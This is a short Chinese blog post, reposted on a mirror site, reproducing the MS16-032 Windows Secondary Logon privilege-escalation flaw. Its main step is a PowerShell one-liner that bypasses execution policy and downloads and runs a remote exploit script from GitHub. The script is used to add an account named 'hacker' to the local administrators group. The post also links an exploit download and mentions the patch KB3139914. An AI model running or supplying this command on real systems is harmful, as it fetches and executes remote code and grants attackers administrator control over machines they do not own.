zoukankan      html  css  js  c++  java
  • MS16-032 漏洞复现

    exploit-db的详情:  https://www.exploit-db.com/exploits/39574/

    Windows: Secondary Logon Standard Handles Missing Sanitization EoP
    Platform: Windows 8.1, Windows 10, not testing on Windows 7
    Class: Elevation of Privilege

    0x01使用标准用户登陆win7,下图是当前登录用户abc的详细信息。

    0x02直接执行命令进行提权,简单粗暴

    powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"

    0x03下面就是见证奇迹的时刻了

    该漏洞危害十分严重,如图在2008server上测试

    本地测试如图,被安全软件检测到。

    微软官方在2016年3月8日发布了补丁KB3139914。

    附上利用提取文件下载地址https://github.com/hexx0r/CVE-2016-0051

    记得旧文章 便是新举子
  • 相关阅读:
    JVM
    OLAP
    rocketMq学习
    redis的使用小记
    CRT配置端口转发
    冒泡排序
    spring AOP-切面编程
    linux下对jar包和war包进行重新打包
    oracle-sql性能优化
    遍历List,根据子项的某个属性分组
  • 原文地址:https://www.cnblogs.com/NBeveryday/p/6196611.html
Copyright © 2011-2022 走看看